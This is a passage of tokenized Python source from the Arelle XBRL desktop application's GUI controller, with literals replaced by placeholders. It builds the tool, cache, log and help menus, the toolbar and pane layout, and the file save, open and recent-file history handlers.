( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . validateCalcLB , onvalue = True , offvalue = False ) <EOL> self . modelManager . validateInferDecimals = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . validateInferDecimals = BooleanVar ( value = self . modelManager . validateInferDecimals ) <EOL> self . validateInferDecimals . trace ( "<STR_LIT:w>" , self . setValidateInferDecimals ) <EOL> validateMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . validateInferDecimals , onvalue = True , offvalue = False ) <EOL> self . modelManager . validateUtr = self . config . setdefault ( "<STR_LIT>" , True ) <EOL> self . validateUtr = BooleanVar ( value = self . modelManager . validateUtr ) <EOL> self . validateUtr . trace ( "<STR_LIT:w>" , self . setValidateUtr ) <EOL> validateMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . validateUtr , onvalue = True , offvalue = False ) <EOL> for pluginMenuExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginMenuExtender ( self , validateMenu ) <EOL> formulaMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> formulaMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . formulaParametersDialog ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = formulaMenu , underline = <NUM_LIT:0> ) <EOL> self . modelManager . formulaOptions = FormulaOptions ( self . config . get ( "<STR_LIT>" ) ) <EOL> toolsMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . compareDTSes ) <EOL> cacheMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> rssWatchMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> rssWatchMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . rssWatchOptionsDialog ) <EOL> rssWatchMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . rssWatchControl ( start = True ) ) <EOL> rssWatchMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . rssWatchControl ( stop = True ) ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = rssWatchMenu , underline = <NUM_LIT:0> ) <EOL> self . modelManager . rssWatchOptions = self . config . setdefault ( "<STR_LIT>" , { } ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = cacheMenu , underline = <NUM_LIT:0> ) <EOL> self . webCache . workOffline = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . workOffline = BooleanVar ( value = self . webCache . workOffline ) <EOL> self . workOffline . trace ( "<STR_LIT:w>" , self . setWorkOffline ) <EOL> cacheMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . workOffline , onvalue = True , offvalue = False ) <EOL> '''<STR_LIT>''' <EOL> cacheMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . confirmClearWebCache ) <EOL> cacheMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . manageWebCache ) <EOL> cacheMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . setupProxy ) <EOL> logmsgMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = logmsgMenu , underline = <NUM_LIT:0> ) <EOL> logmsgMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . logClear ) <EOL> logmsgMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . logSaveToFile ) <EOL> self . modelManager . collectProfileStats = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . collectProfileStats = BooleanVar ( value = self . modelManager . collectProfileStats ) <EOL> self . collectProfileStats . trace ( "<STR_LIT:w>" , self . setCollectProfileStats ) <EOL> logmsgMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . collectProfileStats , onvalue = True , offvalue = False ) <EOL> logmsgMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . showProfileStats ) <EOL> logmsgMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . clearProfileStats ) <EOL> self . showDebugMessages = BooleanVar ( value = self . config . setdefault ( "<STR_LIT>" , False ) ) <EOL> self . showDebugMessages . trace ( "<STR_LIT:w>" , self . setShowDebugMessages ) <EOL> logmsgMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . showDebugMessages , onvalue = True , offvalue = False ) <EOL> toolsMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : DialogLanguage . askLanguage ( self ) ) <EOL> for pluginMenuExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginMenuExtender ( self , toolsMenu ) <EOL> self . menubar . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = toolsMenu , underline = <NUM_LIT:0> ) <EOL> if any ( pluginClassMethods ( "<STR_LIT>" ) ) : <EOL> viewMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> for pluginMenuExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginMenuExtender ( self , viewMenu ) <EOL> self . menubar . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = viewMenu , underline = <NUM_LIT:0> ) <EOL> helpMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> for label , command , shortcut_text , shortcut in ( <EOL> ( _ ( "<STR_LIT>" ) , lambda : Updater . checkForUpdates ( self ) , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , lambda : DialogPluginManager . dialogPluginManager ( self ) , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , lambda : DialogPackageManager . dialogPackageManager ( self ) , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None , None ) , <EOL> ( None , None , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . helpAbout , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None , None ) , <EOL> ) : <EOL> if label is None : <EOL> helpMenu . add_separator ( ) <EOL> elif label == "<STR_LIT>" : <EOL> for pluginMenuExtender in pluginClassMethods ( command ) : <EOL> pluginMenuExtender ( self , helpMenu ) <EOL> else : <EOL> helpMenu . add_command ( label = label , underline = <NUM_LIT:0> , command = command , accelerator = shortcut_text ) <EOL> self . parent . bind ( shortcut , command ) <EOL> for pluginMenuExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginMenuExtender ( self , toolsMenu ) <EOL> self . menubar . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = helpMenu , underline = <NUM_LIT:0> ) <EOL> windowFrame = Frame ( self . parent ) <EOL> self . statusbar = Label ( windowFrame , text = _ ( "<STR_LIT>" ) , anchor = W ) <EOL> self . statusbarTimerId = self . statusbar . after ( <NUM_LIT> , self . uiClearStatusTimerEvent ) <EOL> self . statusbar . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = EW ) <EOL> self . toolbar_images = [ ] <EOL> toolbar = Frame ( windowFrame ) <EOL> menubarColumn = <NUM_LIT:0> <EOL> self . validateTooltipText = StringVar ( ) <EOL> for image , command , toolTip , statusMsg in ( <EOL> ( "<STR_LIT>" , self . fileOpen , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , self . webOpen , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , self . fileSaveExistingFile , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , self . fileClose , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( None , None , None , None ) , <EOL> ( "<STR_LIT>" , self . find , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( None , None , None , None ) , <EOL> ( "<STR_LIT>" , self . validate , self . validateTooltipText , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , self . compareDTSes , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( None , None , None , None ) , <EOL> ( "<STR_LIT>" , self . logClear , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ) : <EOL> if command is None : <EOL> tbControl = Separator ( toolbar , orient = VERTICAL ) <EOL> tbControl . grid ( row = <NUM_LIT:0> , column = menubarColumn , padx = <NUM_LIT:6> ) <EOL> elif isinstance ( image , Combobox ) : <EOL> tbControl = image <EOL> tbControl . grid ( row = <NUM_LIT:0> , column = menubarColumn ) <EOL> else : <EOL> image = os . path . join ( self . imagesDir , image ) <EOL> try : <EOL> image = PhotoImage ( file = image ) <EOL> self . toolbar_images . append ( image ) <EOL> tbControl = Button ( toolbar , image = image , command = command , style = "<STR_LIT>" , padding = toolbarButtonPadding ) <EOL> tbControl . grid ( row = <NUM_LIT:0> , column = menubarColumn ) <EOL> except TclError as err : <EOL> print ( err ) <EOL> if isinstance ( toolTip , StringVar ) : <EOL> ToolTip ( tbControl , textvariable = toolTip , wraplength = <NUM_LIT> ) <EOL> else : <EOL> ToolTip ( tbControl , text = toolTip ) <EOL> menubarColumn += <NUM_LIT:1> <EOL> for toolbarExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> toolbarExtender ( self , toolbar ) <EOL> toolbar . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , W ) ) <EOL> paneWinTopBtm = PanedWindow ( windowFrame , orient = VERTICAL ) <EOL> paneWinTopBtm . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> paneWinLeftRt = tkinter . PanedWindow ( paneWinTopBtm , orient = HORIZONTAL ) <EOL> paneWinLeftRt . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> paneWinLeftRt . bind ( "<STR_LIT>" , self . onTabChanged ) <EOL> paneWinTopBtm . add ( paneWinLeftRt ) <EOL> self . tabWinTopLeft = Notebook ( paneWinLeftRt , width = <NUM_LIT> , height = <NUM_LIT> ) <EOL> self . tabWinTopLeft . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> paneWinLeftRt . add ( self . tabWinTopLeft ) <EOL> self . tabWinTopRt = Notebook ( paneWinLeftRt ) <EOL> self . tabWinTopRt . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> self . tabWinTopRt . bind ( "<STR_LIT>" , self . onTabChanged ) <EOL> paneWinLeftRt . add ( self . tabWinTopRt ) <EOL> self . tabWinBtm = Notebook ( paneWinTopBtm ) <EOL> self . tabWinBtm . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> self . tabWinBtm . bind ( "<STR_LIT>" , self . onTabChanged ) <EOL> paneWinTopBtm . add ( self . tabWinBtm ) <EOL> from arelle import ViewWinList <EOL> self . logView = ViewWinList . ViewList ( None , self . tabWinBtm , _ ( "<STR_LIT>" ) , True ) <EOL> self . startLogging ( logHandler = WinMainLogHandler ( self ) ) <EOL> logViewMenu = self . logView . contextMenu ( contextMenuClick = self . contextMenuClick ) <EOL> logViewMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . logClear ) <EOL> logViewMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . logSaveToFile ) <EOL> if self . hasClipboard : <EOL> logViewMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . logView . copyToClipboard ( cntlr = self ) ) <EOL> windowFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> windowFrame . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT> ) <EOL> windowFrame . columnconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> windowFrame . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> windowFrame . rowconfigure ( <NUM_LIT:1> , weight = <NUM_LIT> ) <EOL> windowFrame . rowconfigure ( <NUM_LIT:2> , weight = <NUM_LIT:1> ) <EOL> paneWinTopBtm . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> paneWinTopBtm . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> paneWinLeftRt . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> paneWinLeftRt . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinTopLeft . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinTopLeft . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinTopRt . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinTopRt . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinBtm . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinBtm . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> window = self . parent . winfo_toplevel ( ) <EOL> window . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> window . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> priorState = self . config . get ( '<STR_LIT>' ) <EOL> screenW = self . parent . winfo_screenwidth ( ) - <NUM_LIT:16> <EOL> screenH = self . parent . winfo_screenheight ( ) - <NUM_LIT:64> <EOL> if priorState == "<STR_LIT>" : <EOL> self . parent . state ( "<STR_LIT>" ) <EOL> w = screenW <EOL> h = screenH <EOL> else : <EOL> priorGeometry = re . match ( "<STR_LIT>" , self . config . get ( '<STR_LIT>' ) ) <EOL> if priorGeometry and priorGeometry . lastindex >= <NUM_LIT:4> : <EOL> try : <EOL> w = int ( priorGeometry . group ( <NUM_LIT:1> ) ) <EOL> h = int ( priorGeometry . group ( <NUM_LIT:2> ) ) <EOL> x = int ( priorGeometry . group ( <NUM_LIT:3> ) ) <EOL> y = int ( priorGeometry . group ( <NUM_LIT:4> ) ) <EOL> if x + w > screenW : <EOL> if w < screenW : <EOL> x = screenW - w <EOL> else : <EOL> x = <NUM_LIT:0> <EOL> w = screenW <EOL> elif x < <NUM_LIT:0> : <EOL> x = <NUM_LIT:0> <EOL> if w > screenW : <EOL> w = screenW <EOL> if y + h > screenH : <EOL> if y < screenH : <EOL> y = screenH - h <EOL> else : <EOL> y = <NUM_LIT:0> <EOL> h = screenH <EOL> elif y < <NUM_LIT:0> : <EOL> y = <NUM_LIT:0> <EOL> if h > screenH : <EOL> h = screenH <EOL> self . parent . geometry ( "<STR_LIT>" . format ( w , h , x , y ) ) <EOL> except : <EOL> pass <EOL> topLeftW , topLeftH = self . config . get ( '<STR_LIT>' , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> if <NUM_LIT:10> < topLeftW < w - <NUM_LIT> : <EOL> self . tabWinTopLeft . config ( width = topLeftW ) <EOL> if <NUM_LIT:10> < topLeftH < h - <NUM_LIT> : <EOL> self . tabWinTopLeft . config ( height = topLeftH ) <EOL> self . parent . title ( _ ( "<STR_LIT>" ) ) <EOL> self . logFile = None <EOL> self . uiThreadQueue = queue . Queue ( ) <EOL> self . uiThreadChecker ( self . statusbar ) <EOL> self . modelManager . loadCustomTransforms ( ) <EOL> if not self . modelManager . disclosureSystem . select ( self . config . setdefault ( "<STR_LIT>" , None ) ) : <EOL> self . validateDisclosureSystem . set ( False ) <EOL> self . modelManager . validateDisclosureSystem = False <EOL> self . setValidateTooltipText ( ) <EOL> def onTabChanged ( self , event , * args ) : <EOL> try : <EOL> widgetIndex = event . widget . index ( "<STR_LIT>" ) <EOL> tabId = event . widget . tabs ( ) [ widgetIndex ] <EOL> for widget in event . widget . winfo_children ( ) : <EOL> if str ( widget ) == tabId : <EOL> self . currentView = widget . view <EOL> break <EOL> except ( AttributeError , TypeError , TclError ) : <EOL> pass <EOL> def loadFileMenuHistory ( self ) : <EOL> self . fileMenu . delete ( self . fileMenuLength , self . fileMenuLength + <NUM_LIT:2> ) <EOL> fileHistory = self . config . setdefault ( "<STR_LIT>" , [ ] ) <EOL> self . recentFilesMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> for i in range ( min ( len ( fileHistory ) , <NUM_LIT:10> ) ) : <EOL> self . recentFilesMenu . add_command ( <EOL> label = fileHistory [ i ] , <EOL> command = lambda j = i : self . fileOpenFile ( self . config [ "<STR_LIT>" ] [ j ] ) ) <EOL> self . fileMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = self . recentFilesMenu , underline = <NUM_LIT:0> ) <EOL> importHistory = self . config . setdefault ( "<STR_LIT>" , [ ] ) <EOL> self . recentAttachMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> for i in range ( min ( len ( importHistory ) , <NUM_LIT:10> ) ) : <EOL> self . recentAttachMenu . add_command ( <EOL> label = importHistory [ i ] , <EOL> command = lambda j = i : self . fileOpenFile ( self . config [ "<STR_LIT>" ] [ j ] , importToDTS = True ) ) <EOL> self . fileMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = self . recentAttachMenu , underline = <NUM_LIT:0> ) <EOL> self . packagesMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> hasPackages = False <EOL> for i , packageInfo in enumerate ( sorted ( PackageManager . packagesConfig . get ( "<STR_LIT>" , [ ] ) , <EOL> key = lambda packageInfo : packageInfo . get ( "<STR_LIT:name>" ) ) , <EOL> start = <NUM_LIT:1> ) : <EOL> name = packageInfo . get ( "<STR_LIT:name>" , "<STR_LIT>" . format ( i ) ) <EOL> URL = packageInfo . get ( "<STR_LIT>" ) <EOL> if name and URL and packageInfo . get ( "<STR_LIT:status>" ) == "<STR_LIT>" : <EOL> self . packagesMenu . add_command ( <EOL> label = name , <EOL> command = lambda url = URL : self . fileOpenFile ( url ) ) <EOL> hasPackages = True <EOL> if hasPackages : <EOL> self . fileMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = self . packagesMenu , underline = <NUM_LIT:0> ) <EOL> def onPackageEnablementChanged ( self ) : <EOL> self . loadFileMenuHistory ( ) <EOL> def fileNew ( self , * ignore ) : <EOL> if not self . okayToContinue ( ) : <EOL> return <EOL> self . logClear ( ) <EOL> self . dirty = False <EOL> self . filename = None <EOL> self . data = { } <EOL> self . parent . title ( _ ( "<STR_LIT>" ) ) ; <EOL> self . modelManager . load ( None ) ; <EOL> def getViewAndModelXbrl ( self ) : <EOL> view = getattr ( self , "<STR_LIT>" , None ) <EOL> if view : <EOL> modelXbrl = None <EOL> try : <EOL> modelXbrl = view . modelXbrl <EOL> return ( view , modelXbrl ) <EOL> except AttributeError : <EOL> return ( view , None ) <EOL> return ( None , None ) <EOL> def okayToContinue ( self ) : <EOL> view , modelXbrl = self . getViewAndModelXbrl ( ) <EOL> documentIsModified = False <EOL> if view is not None : <EOL> try : <EOL> view . updateInstanceFromFactPrototypes ( ) <EOL> except AttributeError : <EOL> pass <EOL> if modelXbrl is not None : <EOL> documentIsModified = modelXbrl . isModified ( ) <EOL> if not self . dirty and ( not documentIsModified ) : <EOL> return True <EOL> reply = tkinter . messagebox . askokcancel ( <EOL> _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) <EOL> if reply is None : <EOL> return False <EOL> else : <EOL> return reply <EOL> def fileSave ( self , event = None , view = None , fileType = None , filenameFromInstance = False , * ignore ) : <EOL> if view is None : <EOL> view = getattr ( self , "<STR_LIT>" , None ) <EOL> if view is not None : <EOL> filename = None <EOL> modelXbrl = None <EOL> try : <EOL> modelXbrl = view . modelXbrl <EOL> except AttributeError : <EOL> pass <EOL> if filenameFromInstance : <EOL> try : <EOL> modelXbrl = view . modelXbrl <EOL> filename = modelXbrl . modelDocument . filepath <EOL> if filename . endswith ( '<STR_LIT>' ) : <EOL> filename = None <EOL> except AttributeError : <EOL> pass <EOL> if isinstance ( view , ViewWinRenderedGrid . ViewRenderedGrid ) : <EOL> initialdir = os . path . dirname ( modelXbrl . modelDocument . uri ) <EOL> if fileType in ( "<STR_LIT:html>" , "<STR_LIT>" , None ) : <EOL> if fileType == "<STR_LIT:html>" and filename is None : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = initialdir , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> elif fileType == "<STR_LIT>" and filename is None : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = initialdir , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> else : <EOL> if filename is None : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = initialdir , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if filename and ( filename . endswith ( "<STR_LIT>" ) or filename . endswith ( "<STR_LIT>" ) ) : <EOL> view . saveInstance ( filename ) <EOL> return True <EOL> if not filename : <EOL> return False <EOL> try : <EOL> ViewFileRenderedGrid . viewRenderedGrid ( modelXbrl , filename , lang = self . labelLang , sourceView = view ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> filename , err ) , <EOL> parent = self . parent ) <EOL> return True <EOL> elif fileType == "<STR_LIT>" : <EOL> return self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = initialdir , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> elif isinstance ( view , ViewWinTests . ViewTests ) and modelXbrl . modelDocument . type in ( ModelDocument . Type . TESTCASESINDEX , ModelDocument . Type . TESTCASE ) : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = os . path . dirname ( self . modelManager . modelXbrl . modelDocument . uri ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not filename : <EOL> return False <EOL> try : <EOL> ViewFileTests . viewTests ( self . modelManager . modelXbrl , filename ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> filename , err ) , <EOL> parent = self . parent ) <EOL> return True <EOL> elif isinstance ( view , ViewWinTree . ViewTree ) : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) . format ( view . tabTitle ) , <EOL> initialdir = os . path . dirname ( self . modelManager . modelXbrl . modelDocument . uri ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not filename : <EOL> return False <EOL> try : <EOL> if isinstance ( view , ViewWinRoleTypes . ViewRoleTypes ) : <EOL> ViewFileRoleTypes . viewRoleTypes ( modelXbrl , filename , view . tabTitle , view . isArcrole , lang = view . lang ) <EOL> elif isinstance ( view , ViewWinConcepts . ViewConcepts ) : <EOL> ViewFileConcepts . viewConcepts ( modelXbrl , filename , labelrole = view . labelrole , lang = view . lang ) <EOL> elif isinstance ( view , ViewWinFactList . ViewFactList ) : <EOL> ViewFileFactList . viewFacts ( modelXbrl , filename , labelrole = view . labelrole , lang = view . lang ) <EOL> else : <EOL> ViewFileRelationshipSet . viewRelationshipSet ( modelXbrl , filename , view . tabTitle , view . arcrole , labelrole = view . labelrole , lang = view . lang ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> filename , err ) , <EOL> parent = self . parent ) <EOL> return True <EOL> elif isinstance ( view , ViewWinXml . ViewXml ) and self . modelManager . modelXbrl . formulaOutputInstance : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = os . path . dirname ( self . modelManager . modelXbrl . modelDocument . uri ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not filename : <EOL> return False <EOL> try : <EOL> from arelle import XmlUtil <EOL> with open ( filename , "<STR_LIT:w>" ) as fh : <EOL> XmlUtil . writexml ( fh , self . modelManager . modelXbrl . formulaOutputInstance . modelDocument . xmlDocument , encoding = "<STR_LIT:utf-8>" ) <EOL> self . addToLog ( _ ( "<STR_LIT>" ) . format ( filename ) ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> self . filename , err ) , <EOL> parent = self . parent ) <EOL> return True <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) <EOL> '''<STR_LIT>''' <EOL> def fileSaveExistingFile ( self , event = None , view = None , fileType = None , * ignore ) : <EOL> return self . fileSave ( view = view , fileType = fileType , filenameFromInstance = True ) <EOL> def saveDTSpackage ( self ) : <EOL> self . modelManager . saveDTSpackage ( allDTSes = True ) <EOL> def fileOpen ( self , * ignore ) : <EOL> if not self . okayToContinue ( ) : <EOL> return <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = self . config . setdefault ( "<STR_LIT>" , "<STR_LIT:.>" ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if self . isMSW and "<STR_LIT>" in filename : <EOL> tkinter . messagebox . showerror ( _ ( "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , parent = self . parent ) <EOL> return <EOL> if os . sep == "<STR_LIT:\\>" : <EOL> filename = filename . replace ( "<STR_LIT:/>" , "<STR_LIT:\\>" ) <EOL> self . fileOpenFile ( filename ) <EOL> def importFileOpen ( self , * ignore ) : <EOL> if not self . modelManager . modelXbrl or self . modelManager . modelXbrl . modelDocument . type not in ( <EOL> ModelDocument . Type . SCHEMA , ModelDocument . Type . LINKBASE , ModelDocument . Type . INSTANCE , ModelDocument . Type . INLINEXBRL ) : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , parent = self . parent ) <EOL> return False <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = self . config . setdefault ( "<STR_LIT>" , "<STR_LIT:.>" ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if self . isMSW and "<STR_LIT>" in filename : <EOL> tkinter . messagebox . showerror ( _ ( "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , parent = self . parent ) <EOL> return <EOL> if os . sep == "<STR_LIT:\\>" : <EOL> filename = filename . replace ( "<STR_LIT:/>" , "<STR_LIT:\\>" ) <EOL> self . fileOpenFile ( filename , importToDTS = True ) <EOL> def updateFileHistory ( self , url , importToDTS ) : <EOL> key = "<STR_LIT>" if importToDTS else "<STR_LIT>" <EOL> fileHistory = self . config . setdefault ( key , [ ] ) <EOL> while fileHistory . count ( url ) > <NUM_LIT:0> : <EOL> fileHistory . remove ( url ) <EOL> if len ( fileHistory ) > <NUM_LIT:10> : <EOL> fileHistory [ <NUM_LIT:10> : ] = [ ] <EOL> fileHistory . insert ( <NUM_LIT:0> , url ) <EOL> self . config [ key ] = fileHistory <EOL> self . loadFileMenuHistory ( ) <EOL> self . saveConfig ( ) <EOL> def fileOpenFile ( self , filename , importToDTS = False , selectTopView = False ) : <EOL> if filename : 